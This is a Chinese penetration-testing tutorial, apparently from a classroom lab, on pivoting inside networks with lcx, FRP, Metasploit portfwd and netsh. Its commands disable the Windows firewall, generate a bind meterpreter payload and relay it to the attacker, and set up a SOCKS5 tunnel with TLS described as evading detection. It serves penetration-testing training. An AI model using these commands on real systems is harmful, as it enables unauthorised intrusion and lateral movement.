仅限高级开发者掌握的秘技:利用cxx-qt突破Qt应用的安全与性能瓶颈
2025/12/31 15:21:31
内网渗透必备:三种转发方式与实战工具全解析
一、前言
在内网渗透测试过程中,我们常常会遇到目标服务端口被防火墙拦截、内网主机无法直接访问公网、需要通过跳板机横向移动等场景。此时,内网转发技术就成为了突破网络限制、实现后续攻击的关键手段。
本文基于实际课堂演示环境,详细讲解内网常见的三种转发方式(端口转发、端口映射、代理转发)的原理与适用场景,并结合lcx、FRP、MSF portfwd等主流工具,通过具体案例演示其实操流程。无论是新手入门还是老手巩固,都能从本文中获取实用的内网转发技术要点,助力顺利完成内网渗透测试工作。
二、实验环境配置
2.1 基础网络环境
主机模式1:设置第一个网段
主机模式2:设置第二个网段
2.2 文章演示网段详细配置
主机网段1:
10.10.11.0/24(DHCP分配范围:128-254)主机网段2:
10.10.2.0/24(DHCP分配范围:128-254)Kali攻击机地址:
192.168.61.251边界机配置:双网卡(
192.168.61.248/10.10.11.130)域内PC设置:双网卡(
10.10.11.131/10.10.2.130)域控PC设置:
10.10.2.200
2.3 边界机业务特点
边界PC的业务结构中,可通过不同网段的IP访问相同的端口业务。
三、内网常见三种转发方式原理
3.1 端口转发
适用于目标机器对某一端口的访问进行了限制的场景。可将本机的端口或本机可访问到的任意主机的端口,转发到任意一台需要访问的公网IP上。
3.2 端口映射
将一个内网无法访问的端口映射到公网的某个端口,进而实施攻击。例如常用的3389远程桌面端口。
3.3 代理转发
主要用于在目标机器上做跳板,进而对内网其他主机实施攻击,实现横向渗透,是内网横向的核心技术。
四、端口转发适用场景与核心工具实操
4.1 端口转发适用场景
- 当前端口无法正常访问
- 要访问的端口未在防火墙中放行,且关闭防火墙失败
- 当前端口未进行映射,对外的IP地址扫描结果中不存在该端口
原理:
4.2 核心工具使用教程
4.2.1 lcx端口转发工具
使用前需先查看防火墙状态,了解本地规则,判断是否存在端口禁用情况。
✅ 防火墙相关命令
# 查看防火墙基础状态 netsh firewall show state # 查看防火墙全配置信息 netsh advfirewall show allprofiles # 开启防火墙 netsh advfirewall set allprofiles state on # 关闭防火墙 netsh advfirewall set allprofiles state off✅ lcx工具基本用法
lcx.exe支持三种核心模式:listen(端口监听)、tran(端口映射)、slave(端口转发),核心命令格式:
lcx.exe -<listen|tran|slave> <option> [-log logfile]各模式参数说明
# 监听本机未占用的两个端口(接收+转发) -listen <ConnectPort> <TransmitPort> # 映射目标端口(本地端口→目标IP+目标端口) -tran <ConnectPort> <TransmitHost> <TransmitPort> # 转发端口(公网主机IP/端口 → 内网主机IP/端口) -slave <ConnectHost> <ConnectPort> <TransmitHost> <TransmitPort>查看防火墙状态,看本地有哪些规则,是否在禁用某些端口
netsh firewall show state netsh advfirewall show allprofiles
启用和关闭方法:
netsh advfirewall set allprofiles state on #开启 netsh advfirewall set allprofiles state off #关闭实操案例
案例1:本地防火墙拦截3389端口,但82端口开放,将3389转发至本地82端口
lcx.exe -tran 82 127.0.0.1 3389案例2:肉鸡端口转发至攻击机,本地访问肉鸡服务
# 1. 攻击机本机监听两个端口(51=接收端口,3389=转发端口) lcx.exe -listen 51 3389 # 2. 肉鸡上运行转发命令,将肉鸡3389转发至攻击机51端口 lcx.exe -slave 攻击机IP 51 肉鸡本机IP 3389 # 3. 攻击机本地访问127.0.0.1:3389,即可连接肉鸡的3389端口案例3:跨主机端口转发(61.248的8080→61.13的888)
# 1. 源主机(192.168.61.248)运行转发程序 lcx.exe -slave 192.168.61.13 888 127.0.0.1 8080 # 2. 目标主机(192.168.61.13)监听端口 lcx.exe -listen 888 8080 # Linux环境下lcx写法 lcx -m 2 -p1 888 -p2 8080✅ 访问说明:在192.168.61.13访问8080端口,即可访问源主机的8080服务(888为流量转发端口,非服务端口)
渗透实战延伸:正向木马+lcx实现内网主机上线
# 1. Kali生成Windows正向meterpreter木马(监听4444端口) msfvenom -p windows/x64/meterpreter/bind_tcp lport=4444 -f exe -o bind_4444.exe # 2. 木马拷贝至域内PC运行,域内PC将监听4444端口 # 3. 域内PC运行lcx,将4444转发至边界PC的11111端口 lcx.exe -slave 10.10.11.130 11111 127.0.0.1 4444 # 4. 边界PC监听11111,转发至本地11112端口 lcx.exe -listen 11111 11112 # 5. Kali连接边界PC的11112,获取域内PC会话 handler -H 192.168.61.248 -P 11112 -p windows/x64/meterpreter/bind_tcp⚠️ 注意:上述方式稳定性差,链接易断。边界PC的转发中,会自动停止转发,导致当前链接断开
✅ 优化方案(边界PC主动映射,需关闭防火墙):
域内PC运行好木马后,会监听本地的4444端口。此时用边界PC主动链接域内PC的4444,然后做本地转发
1、在边界PC中:lcx.exe -tran 6667 10.10.11.131 4444 #注意,当前需要关闭防火墙
2、kali中建立和边界PC端口6667的链接,获取到域内PC的shellhandler -H 192.168.61.248 -P 6667 -p windows/x64/meterpreter/bind_tcp
4.2.2 FRP内网代理转发工具
FRP是功能最强的内网穿透工具,分为服务端(frps.exe,运行在跳板机/VPS)和客户端(frpc.exe,运行在深层内网主机),支持TCP/UDP/HTTP/Socks5等多种转发类型,是内网横向渗透的首选工具。
✅ 准备环境
- 服务端文件:
frps.exe+frps.ini(跳板机/边界机运行) - 客户端文件:
frpc.exe+frpc.ini(深层内网主机运行)
✅ 核心配置文件(frpc.ini)
frps.ini 服务端配置文件 会在本地监听一个端口
[common] # 服务端(跳板机)IP地址 server_addr = 10.10.11.130 # 服务端监听端口(必填,默认7000) server_port = 7000 # 日志文件路径 log_file = ./frpc.log # 日志级别(trace/debug/info/warn/error) log_level = info # 日志保留天数 log_max_days = 3 # 认证令牌(必须与服务端frps.ini一致) token = 12345678 # 管理后台地址/端口/账号密码 admin_addr = 127.0.0.1 admin_port = 7400 admin_user = admin admin_pwd = admin # 预建立连接数 pool_count = 5 # 启用TCP流多路复用(提升稳定性) tcp_mux = true # 通信协议 protocol = tcp # 启用TLS加密(防流量检测) tls_enable = true # 示例1:SSH端口转发(内网22→公网6001) [ssh] type = tcp local_ip = 127.0.0.1 local_port = 22 remote_port = 6001 bandwidth_limit = 1MB use_encryption = false use_compression = false # 示例2:Socks5代理(内网横向核心,攻击机通过6005走跳板) [plugin_socks5] type = tcp remote_port = 6005 plugin = socks5 plugin_user = abc # Socks5认证账号 plugin_passwd = abc # Socks5认证密码 # 示例3:多端口范围转发 [range:tcp_port] type = tcp local_ip = 127.0.0.1 local_port = 6010-6020,6022,6024-6028 remote_port = 6010-6020,6022,6024-6028 use_encryption = false use_compression = false✅ FRP实操步骤
将
frps.exe+frps.ini上传至跳板机(边界PC:10.10.11.130),运行frps.exe,服务端监听7000端口等待客户端连接。将
frpc.exe+配置好的frpc.ini上传至深层内网主机(域内PC:10.10.11.131),运行frpc.exe,客户端自动连接跳板机7000端口完成注册。
跳板机(边界PC)中可以看到端口转发开启,7005端口可以使用(192.168.61.248)攻击机(192.168.61.251)访问跳板机的映射端口(如6005=Socks5代理),即可通过跳板机访问整个内网资源,实现横向渗透。
先做配置:
kali访问:
4.2.3 MSF自带工具portfwd
portfwd是MSF的meterpreter会话自带的端口转发工具,无需额外上传工具,使用便捷,适合应急转发场景。
✅ 基本用法
# 查看帮助文档 portfwd -h # 核心命令格式 portfwd [-h] [add | delete | list | flush] [args]核心参数说明
-h:查看帮助信息-i:端口转发条目索引(通过portfwd list查看)-l:本地监听端口(正向)/本地连接端口(反向)-L:本地监听主机(可选,默认127.0.0.1)-p:远程目标端口-r:远程目标主机IP-R:启用反向端口转发
实操案例
案例1:正向转发——将目标主机3389转发至攻击机本地3303端口
# 在meterpreter会话中执行 portfwd add -L 127.0.0.1 -l 3303 -r 192.168.61.248 -p 3389✅ 访问方式:攻击机本地执行
rdesktop -u 用户名 -p 密码 127.0.0.1:3303,即可连接目标主机3389。
案例2:反向转发——访问跳板机端口,即可访问内网主机服务
# 跳板机端口8809 → 内网主机10.10.11.131的8080端口 portfwd add -R -L 192.168.61.248 -l 8809 -r 10.10.11.131 -p 8080 #访问192.168.61.248的8809时,即是在访问10.10.11.131的8080服务 [!] The remote host (-r) option is ignored for reverse port forwards. [*] Reverse TCP relay created: (remote) [::]:8080 -> (local) 192.168.61.248:8809 meterpreter > portfwd add -R -L 192.168.61.251 -l 8809 -r 192.168.61.248 -p 8080 #访问192.168.61.251的8809等于访问192.168.61.248的80804.2.4 扩展:Windows自带netsh端口转发
适用于无法上传第三方工具的严格环境,利用Windows原生netsh实现端口转发,无文件落地,隐蔽性极强。
# 核心命令:将本地80端口转发至10.10.11.131的8080端口 netsh interface portproxy add v4tov4 listenport=80 listenaddress=0.0.0.0 connectport=8080 connectaddress=10.10.11.131 # 查看转发规则 netsh interface portproxy show all # 删除指定转发规则 netsh interface portproxy delete v4tov4 listenport=80 listenaddress=0.0.0.0 # 清空所有转发规则 netsh interface portproxy reset五、总结
本文围绕内网渗透核心需求,梳理了端口转发、端口映射、代理转发三种核心转发方式的原理与适用场景,并基于课堂实验环境,完整演示了lcx、FRP、MSF portfwd、netsh等工具的实操流程,三种转发方式各有侧重:
- ✅ 端口转发:突破单端口访问限制,解决防火墙拦截问题;
- ✅ 端口映射:实现内网端口公网暴露,远程访问内网服务;
- ✅ 代理转发:构建内网跳板,支撑横向渗透核心需求。
渗透实操核心要点
- 先排查目标防火墙状态与端口规则,按需选择转发工具;
- 优先使用系统自带工具(
netsh/portfwd)减少操作痕迹,必要时再用第三方工具(lcx/FRP); - 转发过程中关注链路稳定性,避免因连接断开导致渗透失败;
- FRP是内网渗透的终极工具,优先掌握Socks5代理配置,支撑内网全网段横向。
后续拓展方向
可进一步探索FRP高级配置(HTTPS转发、P2P穿透、自定义插件)、不同转发工具的组合使用场景,以及转发流量的加密与防检测技巧,提升内网渗透的灵活性与成功率。